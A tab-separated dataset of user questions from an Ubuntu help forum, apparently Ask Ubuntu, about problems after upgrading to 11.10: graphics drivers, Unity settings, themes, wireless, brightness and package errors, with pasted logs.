67115	how to enable open source radeon driver for a radeon hd 5570 ?	i upgraded from ubuntu 11.04 ( using fglrx driver from amd site ) to 11.10 . after upgrade 3d acceleration is not working with my radeon hd 5570 fails to run any program with 3d acceleration . i tried to remove ati driver and reinstall it but to no avail . i also tried live cd and there open source driver works great , but i do n't know how to enable it on my computer . uninstalling fglrx did n't work . any ideas ?
67116	how to run abcde when i insert music cds	i used to have abcde run automatically and rip a cd when i put it in my computer . i did this by selecting abcde for when a cd is inserted through the media tab in nautilus but this option has been removed in 11.10 . there is n't an option to add a custom command in the menu on removable media so how would i go about getting abcde to run when i insert a cd .
67120	are bad download speeds considered normal after a release of a new ubuntu version ?	installing new packages on my recently installed ubuntu machine is slow . fetching apt headers even took me more than three minutes because they are downloaded at ~20kb/s – in my case from at.archive.ubuntu.com – not to mention the actual packages themselves , which are much larger . is this considered normal in the days after a major version release ? what can i do to speed up my downloads ? can i switch to another mirror ? does that even pay off ? or should i wait with the downloads until the big hype has cooled down ?
67124	upgrade from 11.04 to 11.10 did not complete - now hangs on reboot ?	after the download and during the install it asked if i would accept microsoft conditions regarding fonts ( ? ) , and an was presented but would not accept any decision and just hung there . tried everything in my book ( still a relative newbie ) but it just remained effectively frozen , so i resorted to the ultimate sin and hit the reboot button ! since then it will not reboot other than to the point of presenting the linux options for start-up . there 's a message saying waiting for network to start whilst showing the purple screen and kubuntu 11.04 but it never progresses any further . i would either like to revert to a fully functioning 11.04 , and not have my application software and files removed or corrupted or , if i can be persuaded , to upgrade to 11.10 . advice please .
67128	how portable are binaries compiled in ubuntu ?	the title says it all , actually . but allow me to specify the question : assuming i were to compile an application that uses libffi , libgl , dlfcn , and sdl , would said binary run on other linux distributions with same architecture , etc ? the reason i ask is because of the directory /usr/lib/i386-linux-gnu - i might be wrong , but i assume this directory is something rather ubuntu-specific , no ? so , how portable are binaries compiled on ubuntu really ?
67129	how come xorg refuses to generate an xorg.conf file for me ?	i have a displaylink monitor that i am trying to add to my ubuntu desktop . after plugging it in , the screen turns completely green , which i understand means that the displaylink kernel module is installed and can interface with the device . adding the monitor to my xorg.conf should n't be too hard except there is no /etc/x11/xorg.conf . apparently i have to generate one - so that 's what i tried to do with the following command : xorg -configure however , this seems to be failing . here is the output of the command : x.org x server 1.10.4 release date : 2011-08-19 x protocol version 11 , revision 0 build operating system : linux 2.6.24-29-server x86_64 ubuntu current operating system : linux my-machine 3.0.0-12-generic # 20-ubuntu smp fri oct 7 14:56:25 utc 2011 x86_64 kernel command line : boot_image=/boot/vmlinuz-3.0.0-12-generic root=uuid=e2b7e4b2-720a-4ea7-af1c-3757f4c36bfc ro quiet splash vt.handoff=7 build date : 29 september 2011 02:45:13am xorg-server 2:1.10.4-1ubuntu4 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.22.2 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : sat oct 15 14:07:13 2011 list of video drivers : siliconmotion radeon displaylink qxl s3 sis neomagic trident tdfx r128 vmwlegacy ati vmware nouveau mga intel savage openchrome mach64 cirrus sisusb fbdev vesa ( ee ) failed to load module `` vmwgfx '' ( module does not exist , 0 ) ( ee ) vmware : please ignore the above warnings about not being able to to load module/driver vmwgfx ( ee ) vmware : unexpected failure while loading the `` vmwlegacy '' driver . giving up . ( ee ) failed to load module `` vmware '' ( a required submodule could not be loaded , 0 ) ( ++ ) using config file : `` /home/nathan/xorg.conf.new '' ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' number of created screens does not match number of detected devices . configuration failed . ddxsiggiveup : closing log here is the output of sudo lspci : 00:00.0 host bridge : intel corporation n10 family dmi bridge 00:02.0 vga compatible controller : intel corporation n10 family integrated graphics controller 00:02.1 display controller : intel corporation n10 family integrated graphics controller 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 02 ) 00:1c.2 pci bridge : intel corporation n10/ich 7 family pci express port 3 ( rev 02 ) 00:1c.3 pci bridge : intel corporation n10/ich 7 family pci express port 4 ( rev 02 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation nm10 family lpc controller ( rev 02 ) 00:1f.2 sata controller : intel corporation n10/ich7 family sata ahci controller ( rev 02 ) 0 0:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 02 ) 01:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 )
67130	sony vaio fw350 reboots instead of waking up after sleep/suspend	after i suspend and try to wake up my laptop it just automatically reboots every time . i had this problem in 11.04 , but it happened occasionaly . now i 'm with 11.10 and it occurs every time . it is a sony vaio fw350 . it has an onboard intel graphics . i also have this other problem since 9.10 : http : //ubuntuforums.org/showthread.php ? t=1448330 i guess they are related problems .
67132	how can i play songs by just hovering the mouse on them ?	in ubuntu 11.04 i could play songs by putting the mouse on them . but now in ubuntu 11.10 it does n't work . thanks for helping !
67133	remove user session indicator in unity ?	is there any possibility to remove my user session applet from the top pane of unity in ubuntu 11.10 ? i mean that with my name . it only wastes space . however , when i tried to uninstall session-indicator ( with session-applet ) , the applet disappeared , but the very right button ( that to shut down laptop or access system settings ) was also gone . how can i remove only the session applet ( is it the right name of it ? ) - that applet displaying my name ?
67137	why is an orange glow over half my screen when no windows are even open ?	came to computer , screen was locked , and orange glow ( as though i had dragged a window to far left of screen , and it was showing me a preview of where it would snap to ) was over left half of screen before i even logged back in , and i was on a clean desktop , with no windows open . it would not go away , and even after i unlocked screen , and it remained on desktop , and even in expo view ( covered whole left side of expo view - two desktops ) . finally disappeared after second screen shot .
67148	how to install windows 7 theme with gnome shell ?	i installed gnome shell on ubuntu 11.04 and logged in with it . but when i try to install the windows theme , it complains that gnome desktop session is required anyone knows why this is ? is there another way to make it look like windows ? software center shows gnome-shell installed ( which included gnome-session manager ) . i 'm installing windows theme downloaded from here .
67155	how do i change icon themes ?	i like the default ubuntu theme in oneric , it 's nice and all , but i 've got other themes , icon sets , pointers , etc that i want to install . how do i do this ? in previous versions it was a matter of right-clicking on the desktop , choosing `` change desktop background '' from the drop-down menu and behold : all of my theme options were right there . now , they 're not . so how do i install new themes and stuff using the unity desktop ? ( not gnome ) i thought ubuntu was supposed to be getting more user friendly . . .
67156	juju bootstrap on local machine gives an error	trying to use juju in a local environment . here is my ~/.juju/environments.yaml file : environments : sample : type : local control-bucket : juju-a14dfae3830142d9ac23c499395c2785999 admin-secret : 6608267bbd6b447b8c90934167b2a294999 default-series : oneiric juju-origin : distro data-dir : /home/matteo/juju the path /home/matteo/juju exists . but when i type juju bootstrap here is the output : 2011-10-16 00:07:32,367 info bootstrapping environment 'sample ' ( type : local ) ... 2011-10-16 00:07:32,367 info checking for required packages ... 2011-10-16 00:07:32,650 info starting networking ... too many values to unpack 2011-10-16 00:07:32,897 error too many values to unpack many thanks in advance ! edit : after restarting my pc now it shows this : 2011-10-17 00:02:13,850 info bootstrapping environment 'sample ' ( type : local ) ... 2011-10-17 00:02:13,850 info checking for required packages ... 2011-10-17 00:02:14,142 info starting networking ... errore : impossibile avviare la rete default errore : requested operation is not valid : network is already active command ' [ 'virsh ' , 'net-start ' , 'default ' ] ' returned non-zero exit status 1 2011-10-17 00:02:14,176 error command ' [ 'virsh ' , 'net-start ' , 'default ' ] ' returned non-zero exit status 1
67157	is rtlinux the same as linux-rt ?	i 'm trying to install a hard realtime kernel in lucid for some robotics work . my preference is rtlinux ( http : //rtlinuxfree.com ) by wind river systems . i also see that there is a package by the name `` linux-rt '' in the repositories , and its description is : `` complete realtime ( rt ) linux kernel '' . my question is : are these two the same ? if not , what are the differences between them and the pros and cons of each ?
67163	upgrading ubuntu lead to a new , broken version , but the old one still runs	do n't know what else to add . grub now presents 2 x 2 options . using the older version works fine , using the new one ( regular and fail safe ) does n't work . i 'd like to be up to date , but also to actually have the newest version working . not working = when i choose it , i end up on a black screen , `` forever '' ( more than 1 minute ) . ubuntu installed as wubi , in windows 7 .
67164	step to step how to install cinelerra	i have some problems installing cinelerra on my ubuntu 11.10 . i tried to follow some guides on the internet but none of them worked . how do i install it ?
67170	gnome-sushi doesnt work in unity 3d	i installed gnome-sushi and try to test it , but it does n't work . i tested it by typing `` sushi '' into terminal it does n't work . i get an error message . ( sushi-start:20986 ) : gdk-warning ** : the program 'sushi-start ' received an x window system error . this probably reflects a bug in the program . the error was 'badlength ( poly request too large or internal xlib length erro ' . ( details : serial 221 error_code 16 request_code 155 minor_code 30 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) i tried it by logout and login but it does n't work . i know that it should work with both unity and gnome-shell . i tested it from terminal with sudo sushi and tried to preview a file in nautilus and get this error this time : could not load classifier cascade /usr/share/opencv/haarcascades/haarcascade_frontalface_alt2.xml i searched a lot but did n't find a solution for my problem on the net and decided to ask you . thanks in advance
67173	autologin to gnome-shell in ubuntu 11.10	i 've installed gnome-shell on ubuntu 11.10 from official repository . but after the choosing gnome session at the greeter window , login in gnome-shell and after this rebooting , it does n't boot automaticaly to gnome-shell ( as was before with unity session ) . it just stops at the greeter window with option to type password and choose the session . how to make autologin to gnome-shell ?
67174	how do i make my touchpad buttons work on a probook 4520s ?	i have the probook 4520s notebook , and the right button of my touchpad does not work . could you help me fix this problem ?
67178	safely remove folders that only windows uses	i 've been using an external hard drive in windows , but now that i decided to switch to ubuntu , i wonder if i can safely remove the folders $ recycle.bin , recycler , $ avg and found.000
67190	missing disk space after upgrade from 11.04 to 11.10 . how come ?	i have a problem with my disk space on ubuntu . i 'll say some facts : when i installed ubuntu , i told ubuntu to take 25gb of space . i installed ubuntu on my d : \ drive , which is not the drive on which is my windows 7 i have a dual boot ( ubuntu and windows 7 ) i saw that i am low in disk space today , never checked before . yesterday , i updated from 11.04 to 11.10 i heard that ubuntu takes 700mb ( this is why i do n't understand what is happening ) my d : \ drive has about 15gb remaining . my questions are : what took all the 24gbs ? how to add space to the home folder ? and why does my disk usage analyzer shows that there is 136.7 gb in the file system ? : disk usage analyzer screenshot : thanks to anyone who answers : )
67192	toshiba laptop external speakers do n't work	i have a toshiba satellite l745-s4210 . i did a full install of ubuntu 11.04 from a cd . i do n't have windows 7 on the computer . my internal speakers work but the external speakers will not . when i say external speakers i mean the speakers on my desk that plug into the headphone jack.i have tried changing settings under the sound menu in system settings .
67193	desktop unresponsive after login	i 've just upgraded to oneiric and a few seconds after logging into unity 3d , the whole desktop freezes . i tried unity -- reset , unity -- advanced-debugging , re-enable from the ccsm . the only thing i could do is restart lightdm from a tty and log in to unity 2d but it is too slow . my machine passes the unity support test . the interesting part is that the beta2 release worked just fine . i would file a bug , but i ca n't decide whether it 's a unity/gtk3/compiz bug . -has anyone met this issue before ? -is there any way i could use unity 3d somehow , bypassing the issue ? -what should i do to help debug this one ?
67194	unity runs slow , how can i improve its performance ?	i like how unity looks but i have 2 problems : unity 3d when i login with unity 3d , my pc becomes slower , i got an amd ii x3 with 2gb of ram , nvidia gforce 6150se nforce 430/pci/sse2 integrated . when i try to open the dash , take a lot of time to open , most often takes up to 5 seconds and while its opening remains fuzzy and unreacted , even the apps or folders take the same time to open and the same reaction . unity 2d when i login with unity 2d my pc goes more faster , the only problem is that i cant configure unity as i want , i try to configure the unity plugin in ccsm . for eg : i changed `` hide launcher '' to : never . it does not save changes , even when i restart my computer . i do n't know if the problem is with unity 3d or with my pc .
67197	icons disappeared from the messaging menu	i have installed ubuntu 11.10 and several icons have disappeared off the messaging menu . what i can do to repair this ?
67198	just started using unity from ubuntu classic . missing indicators	i just moved to ubuntu unity and found my indicators missing ( 11.04 ) also i have tried installing ubuntu 11.10 cli ( using alternate cd ) , then install -- no-install-recommends ubuntu-desktop . i remember all indicators are missing . i think those i want are : network clock session ( to shutdown ) email ( thunderbird & chat in 11.10 ) synapse dropbox lookit for 11.04 and 11.10 how can i get back my indicators ? for 11.04 , i have those indicators when using ubuntu classic so is there some conflict or something ?
67199	title bar stuck on theme	just installed ubuntu 11.10 . i downloaded a couple themes and tried switching them up using gnome tweak . the windows will change themes but the title bar is stuck on ambiance . it was switching themes ok right after the clean install , so i tried removing the downloads from .themes folder . also tried `` unity -- replace '' , `` compiz -- replace '' , and restarting . anyone have any other ideas ? ? thanks . also -ben
67204	how to restore/change alt+tab behaviour/ram usage and a few other things after ubuntu upgrade from 11.04 to 11.10 ?	i use ubuntu for programming . i recently updated it from 11.04 to 11.10 . there are some things i do n't like in the new version of unity desktop interface . i do n't actually know if it is hard to restore previous behavior or not , and if it is not , where should i look to do that . i know a bit of programming , but i really do n't know much about linux settings . i used to have 3-6 terminal windows and switch between them with alt+tab and shift+alt+tab . i liked half-transparent terminal windows , since with them i could open web-page with some instruction in firefox , press alt+tab and type commands in a console window , being able to recognize text on a web-page under it . now i have problems with my usual work-style because of the following . list of `` negative '' changes alt+tab shows just one icon for all console windows . when i wait some time , it , however , shows all windows , but i do n't like to wait . i prefer to remember order of windows and press alt+tab as many times as i need to switch to the right window . alt+shift+tab to switch in reverse order does n't work now . console windows are not transparent any more . when i do n't wait , and switch to this icon , it shows all console windows altogether . so even if they were transparent , i would n't be able to see anything below them ( i can read something only from the window , which is directly under current one , not a few levels under ) . when i run a few console windows in unity i had 740mb used on ubuntu 11.04 , but i have 1050mb now . the question is how to make it back to 750- . i really need my memory , since i use my computer to work with 1512mb of data and i try to save every 10mb possible ( if it does n't take too much of machine and , more importantly , my time ) . when i press `` the super key '' i have a field to type the name of the program i want to run . but now it sometimes shows this field , but when i 'm trying to type nothing happens . probably , focus is not on the right field . i do n't really mean to restore exactly the same behavior , but i want to make my work in ubuntu 11.10 efficient ( at least as efficient as in ubuntu 11.04 ) . i would be happy if there are some ways to accomplish that . what have i tried i have installed compizconfig settings manager . i have read this question . however enabling `` static application switcher '' makes alt+tab crazy : after enabling it it says about key-binding conflicts with `` ubuntu unity plugin '' ; '' alt+tab '' switching does n't change , but `` shift+alt+tab '' now works and shows all windows ; memory usage increases . i have tried turning off ubuntu unity plugin , but this does n't seem right thing to do , since it seems to turn off all menus , a lot of keystrokes and app-launcher , which usually activates with `` the super key '' . i have found , that window transparency can be enabled by `` opacity , brightness and saturation '' plugin from accessibility . however i do n't know if enabling it is the right thing to do ( at least it increases memory usage ) . update : everything solved but # 3 : see my own answer below . i have made a separate question about issue # 3 ( transparency ) .
67209	how can i change font color ?	the default font color is gray and the contrast makes it hard to read . how can i keep the theme ( ambiance ) but make the font dark ? i knew how to do this prior to ubuntu 11.10 but now i ca n't find it . thank you .
67216	unable to choose default application	i just upgraded to ubuntu 11.10 and wanted to set up .z4 files so that they would be opened by gargoyle-free ( as an example ) although gargoyle-free is not an option in the default application list that arises from the context menu . it used to be possible to manually enter a default application directly from the dialog , however the feature seems to have been replaced by a simplified ( and unfortunately useless ) `` find application online '' button . is there perhaps a new way to do this that does n't involve messing with the command line ? some applications ( like clementine audio player ) are n't listed in `` other applications '' .
67218	how do i create a desktop wallpaper slideshow in oneiric ?	none of the solutions listed in these two questions ... how do i create a desktop wallpaper slideshow ? how do i create a custom slideshow as a background ? ... have been updated for gnome 3 . is it possible to create a slideshow with a xml in oneiric ?
67221	ubuntu usb on a mac	i followed the instructions on ubuntu.com to install ubuntu onto a usb for a mac . when i insert my usb in mac os x it now says the disk you inserted was not readable by this computer . is this normal ? also , when i start my mac and press alt the usb does n't show up . does anyone know what i could 've done wrong ? i made the usb with the latest macbook air and am running it on a 2 year old macbook .
67222	restore original apache.conf file	i just installed apache and did a fresh install of ubuntu 11.10 . i 've accidently appended and replaced the apache.conf file using this operation : echo `` blah '' > apache.conf instead of this command echo `` blah '' > > apache.conf is there a way to recover the original apache.conf file somewhere ?
67228	is the `` partition is misaligned error '' legit ? how should i handle ?	i just migrated to a new 750gb seagate momentus drive on my thinkpad x201 . i 'd cloned the orginal 500gb drive using clonezilla , and then repartitioned with gparted live . i was successful in growing my partitions after i deleted and recreated the swap drive per this thread : advice on moving partitions with gparted after cloning drive to a larger one after booting into the newly partitioned environment i went to disk utility to check on the drive , and was greeted with the warning : `` the partition is misaligned by 512 bytes etc ... the system seems fine , and i 'm seeing conflicting information out there regarding the validity of this warning ... i still have the original drive and can easily go back if necessary . any feedback is appreciated .
67229	how to make terminal windows half-transparent in unity 2d ?	that 's it . i want to have terminal windows to be ( half- ) transparent in unity 2d without wasting too much resources . this question has arisen after an update from ubuntu 11.04 to 11.10 , after which i was happy to find , that i can switch from unity 3d back to unity 2d . i have tried to use gconf-editor , but have n't find anything useful there ( only a few entries about unity-2d in desktop -- > unity-2d , which does n't seem to be relevant ) .
67230	which java packages do i need to run when installing aptana ?	i download the latest aptana 3.0.5 after reinstalling ubuntu 11.10 . i place aptana in the /opt/ folder . upon trying to launch the application it warns me with : a java runtime environment ( jre ) or java development kit ( jdk ) must be available in order to run aptanastudio3 . no java virtual machine was found after searching the following locations : /opt/aptanastudio3/jre/bin/java java in your current path is this error occurring because i 'm missing java packages ? previously in 11.04 i had to install a couple different java packages ( i forgot which ) and it suddenly worked . what do i need to do to get aptana working ?
67236	is there a way to save the output of vbeinfo ?	i 'm trying to correct some grub2 and plymouth display problems in 11.10 as part of an ongoing saga . i 'm going to run the vbeinfo command to check supported display modes , but unfortunately from what i can tell this command can only be run from grub2 , and hence the output is only visible while the command is run in it . i would like to keep a copy of the output for reference or sharing . is it possible to save this output somewhere i can access it after logging in , and if so , how would i do it ? alternately , if it is not possible to save the output , then why not ? and because i know someone might answer with this : no , i do not have a camera handy to take a picture of my screen ( besides my laptop 's webcam , which is an awkward solution at best ) , and i would rather not write it all down on paper if i can help it .
67237	how to get wireless working on acer aspire 5742 ?	i 've upgraded to oneiric and can not get wifi to work at all . previous versions from maverick onward have ahd the smae initial problems , but were overcome with the activation of hardware keys . this time however it did n't work . wireless activation can be toggled on and off , the broadcom drivers are listed as installed and active . in the indicator menu wireless is greyed out and stated as `` disconnected '' . `` rfkill list '' gives : 0 : phy0 : wireless lan soft blocked : no hard blocked : no i 'm pretty sure that acer-wmi is meant to be present , but i 'm no expert . someone please help ?
67238	how to change the current path to a directory that has an space on it 's name ?	well i know how to open a folder in the terminal ( using cd ) . but when the name of this folder have space ? ex : eclipse indigo . if you use cd eclipse indigo does not recognize
67239	how do i get geforce 540m switchable graphics working ?	first question on here ... i recently bought an alienware m11x r3 [ 8gb ram , intel core i5-2537m 1.4ghz ( 2.3ghz turbo mode , 3mb cache ) , nvidia geforce gt540 graphics with 1.0gb video memory and optimus ] . after a fair amount of gaming , it , 's time to let up on windows and dual-boot . i was on 11.04 before with a toshiba satellite t135-s309 , worked well enough . now , i ca n't get the computer to utilize the driver on the new 11.10 -- system info tells me the driver is unknown , i ca n't get 3d effects out of it , and games run rather slowly . i tried updating with the driver from nvidia 's site , but when it configures xorg.conf , lightdm fails and startx wo n't initiate lightdm . mainly , i can not get nvidia x server settings to work , as nvidia-xconfig requires restoring the backup to have any manager . i saw a few posts about using bumblebee and users having success , but i saw no results from using this . do n't see any switcheroo in the system . the bios has no way to dictate which graphics card is used , and all i 'd really like is setting the 540m to always be used , or to have 3d enabled one way or another . is there any way to configure ubuntu to recognize/utilize the card ? ` @ : ~ $ optirun64 nvidia-settings -c :1 optirun64 : command not found @ : ~ $ optirun nvidia-settings -c :1 ( nvidia-settings:4304 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( nvidia-settings:4304 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( nvidia-settings:4304 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( nvidia-settings:4304 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , error : can not open display ':1 ' . @ : ~ $ ` edit : i 've given up any hope on running the nvidia on ubuntu , but at the very least i 'd like to find a way to enable 3d using the intel card . any possibility in this ? i 've read things about blacklisting the nvidia card , but that did n't seem to work for me : it said permission was denied , even with sudo . i 'm thinking if i can find a good driver for the intel , i can blacklist the nvidia and just use the intel .
67244	how to change desktop font and font size	the desktop 's font is too big . also , i want to change the font . gnome-tweak-tool did not have the option for that .
67251	ca n't uninstall ubuntu one and banshee in ubuntu software center	i recently upgraded my google cr-48 to ubuntu 11.10 from ubuntu 11.04 . i have several questions . i try uninstalling ubuntu one like i did previously ( why did it re-install ? ) . it comes up with an error saying that it ca n't uninstall . i see banshee is installed , and i ca n't uninstall it either . here is what the error message from banshee read : package operation failed the installation or removal of a software package failed . details : installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 197253 files and directories currently installed . ) removing banshee-extension-soundmenu ... removing banshee ... processing triggers for man-db ... processing triggers for shared-mime-info ... processing triggers for hicolor-icon-theme ... processing triggers for gnome-menus ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... setting up samba4 ( 4.0.0~alpha17~git20110807.dfsg1-1ubuntu1 ) ... unknown parameter encountered : `` max log size '' ignoring unknown parameter `` max log size '' unknown parameter encountered : `` syslog '' ignoring unknown parameter `` syslog '' unknown parameter encountered : `` unix password sync '' ignoring unknown parameter `` unix password sync '' unknown parameter encountered : `` passwd program '' ignoring unknown parameter `` passwd program '' unknown parameter encountered : `` pam password change '' ignoring unknown parameter `` pam password change '' unknown parameter encountered : `` map to guest '' ignoring unknown parameter `` map to guest '' unknown parameter encountered : `` usershare allow guests '' ignoring unknown parameter `` usershare allow guests '' unknown parameter encountered : `` username map '' ignoring unknown parameter `` username map '' unknown parameter encountered : `` writeable '' ignoring unknown parameter `` writeable '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` max log size '' ignoring unknown parameter `` max log size '' unknown parameter encountered : `` syslog '' ignoring unknown parameter `` syslog '' unknown parameter encountered : `` unix password sync '' ignoring unknown parameter `` unix password sync '' unknown parameter encountered : `` passwd program '' ignoring unknown parameter `` passwd program '' unknown parameter encountered : `` pam password change '' ignoring unknown parameter `` pam password change '' unknown parameter encountered : `` map to guest '' ignoring unknown parameter `` map to guest '' unknown parameter encountered : `` usershare allow guests '' ignoring unknown parameter `` usershare allow guests '' unknown parameter encountered : `` username map '' ignoring unknown parameter `` username map '' unknown parameter encountered : `` writeable '' ignoring unknown parameter `` writeable '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' module samba_dsdb initialization failed : no such object unable to load modules for /var/lib/samba/private/sam.ldb : dsdb_module_search_dn : did not find base dn @ rootdse ( 0 results ) traceback ( most recent call last ) : file `` /usr/share/samba/setup/upgradeprovision '' , line 1716 , in < module > ldbs = get_ldbs ( paths , creds , session , lp ) file `` /usr/lib/pymodules/python2.7/samba/upgradehelpers.py '' , line 156 , in get_ldbs ldbs.sam = samdb ( paths.samdb , session_info=session , credentials=creds , lp=lp , options= [ `` modules : samba_dsdb '' ] ) file `` /usr/lib/pymodules/python2.7/samba/samdb.py '' , line 55 , in __init__ options=options ) file `` /usr/lib/pymodules/python2.7/samba/__init__.py '' , line 114 , in __init__ self.connect ( url , flags , options ) file `` /usr/lib/pymodules/python2.7/samba/samdb.py '' , line 69 , in connect options=options ) _ldb.ldberror : ( 80 , 'dsdb_module_search_dn : did not find base dn @ rootdse ( 0 results ) ' ) dpkg : error processing samba4 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : samba4 setting up samba4 ( 4.0.0~alpha17~git20110807.dfsg1-1ubuntu1 ) ... unknown parameter encountered : `` max log size '' ignoring unknown parameter `` max log size '' unknown parameter encountered : `` syslog '' ignoring unknown parameter `` syslog '' unknown parameter encountered : `` unix password sync '' ignoring unknown parameter `` unix password sync '' unknown parameter encountered : `` passwd program '' ignoring unknown parameter `` passwd program '' unknown parameter encountered : `` pam password change '' ignoring unknown parameter `` pam password change '' unknown parameter encountered : `` map to guest '' ignoring unknown parameter `` map to guest '' unknown parameter encountered : `` usershare allow guests '' ignoring unknown parameter `` usershare allow guests '' unknown parameter encountered : `` username map '' ignoring unknown parameter `` username map '' unknown parameter encountered : `` writeable '' ignoring unknown parameter `` writeable '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` max log size '' ignoring unknown parameter `` max log size '' unknown parameter encountered : `` syslog '' ignoring unknown parameter `` syslog '' unknown parameter encountered : `` unix password sync '' ignoring unknown parameter `` unix password sync '' unknown parameter encountered : `` passwd program '' ignoring unknown parameter `` passwd program '' unknown parameter encountered : `` pam password change '' ignoring unknown parameter `` pam password change '' unknown parameter encountered : `` map to guest '' ignoring unknown parameter `` map to guest '' unknown parameter encountered : `` usershare allow guests '' ignoring unknown parameter `` usershare allow guests '' unknown parameter encountered : `` username map '' ignoring unknown parameter `` username map '' unknown parameter encountered : `` writeable '' ignoring unknown parameter `` writeable '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' module samba_dsdb initialization failed : no such object unable to load modules for /var/lib/samba/private/sam.ldb : dsdb_module_search_dn : did not find base dn @ rootdse ( 0 results ) traceback ( most recent call last ) : file `` /usr/share/samba/setup/upgradeprovision '' , line 1716 , in < module > ldbs = get_ldbs ( paths , creds , session , lp ) file `` /usr/lib/pymodules/python2.7/samba/upgradehelpers.py '' , line 156 , in get_ldbs ldbs.sam = samdb ( paths.samdb , session_info=session , credentials=creds , lp=lp , options= [ `` modules : samba_dsdb '' ] ) file `` /usr/lib/pymodules/python2.7/samba/samdb.py '' , line 55 , in __init__ options=options ) file `` /usr/lib/pymodules/python2.7/samba/__init__.py '' , line 114 , in __init__ self.connect ( url , flags , options ) file `` /usr/lib/pymodules/python2.7/samba/samdb.py '' , line 69 , in connect options=options ) _ldb.ldberror : ( 80 , 'dsdb_module_search_dn : did not find base dn @ rootdse ( 0 results ) ' ) dpkg : error processing samba4 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 can anyone provide any assistance ?
67252	how can i make ubuntu recognize 2 different speaker pairs through an audio splitter ?	i have 2 different pairs of speakers ( one with a sub , one without ) that both connect to standard trs connectors . my laptop only has one female jack , so i purchased an audio splitter like the one below in order to use both . how can i make ubuntu recognize that there are two different speaker devices plugged in , in order to change the balance on them through the sound preferences ?
67258	something behind the unity title bar	i recently upgraded my google cr-48 to ubuntu 11.10 from ubuntu 11.04 . it appears as if there is something behind the title bar . is this normal ? i also need to ask how i can take a screenshot to show this . i do n't have a print screen key .
67262	brightness issues on a samsung n220	i updated my ubuntu to 11.10 a few hours ago and the screen brightness keeps going up to the maximum and down to the minimum all the time on it 's own . sometimes it stops for a few minutes . and when i try to set it myself manually or when a few minutes has passed , it starts up again . ( i 'm new in trying to fix my own problems , so i might not get the obvious things right away . ) i now restarted a couple of times and now i 'm using a newer version of kernel and the brightness is now constantly down and ca n't be set manually . my laptop is a samsung n220 . i bought it a little over a year ago . i still have windows 7 starter on it ( it was originally on it ) , but i had ubuntu put on it from the start .
67264	can i replace the system settings with the old one ?	i recently upgraded my google cr-48 to ubuntu 11.10 from ubuntu 11.04 . is there any way i can replace the new system settings with one that is actually useful , like the old one ?
67270	screen brighness control does n't work on a samsung netbook nn150plus	i have just updated to 11.10 form 11.04 . i use a samsung nn150plus netbook and have no control over the screen brightness . if i use the keyboard keys its either full brightness or on minimum . if i use the system settings/display , it freaks out and runs from low to high without any control . this is a major issue and makes the netbook almost unusable .
67275	is/will the amd radeon hd 6650m be supported ?	i have a discrete amd radeon hd 6650m graphic card . i ca n't run it , whether with the free radeon driver and vga_switcheroo nor with fglrx and sudo aticonfig -- px-dgpu . will ubuntu support this graphic card soon ?
67280	wireless does n't connect after suspend on an asus k52f	i 'm on an asus k52f running ubuntu 11.10 with the ar9285 wireless card . wifi works acceptably before suspending , after it does n't show any networks . the only solution i 've found is a full reboot .
67282	how to set the window movement key ?	in 11.04 , i could go to `` windows '' under `` system settings '' to change the the key used to grab/move windows , which is by default alt . in 11.10 , the `` window '' option is no longer under `` system settings '' and i ca n't find the movement key shortcut in the `` shortcuts '' menu under `` keyboard '' . i do n't know where else to check ... the reason i need to change that setting is to use the alt key under wine in photoshop . photoshop is the only windows application i use ( other than rosetta stone ) , so i 'd like to have its full functionality under wine .
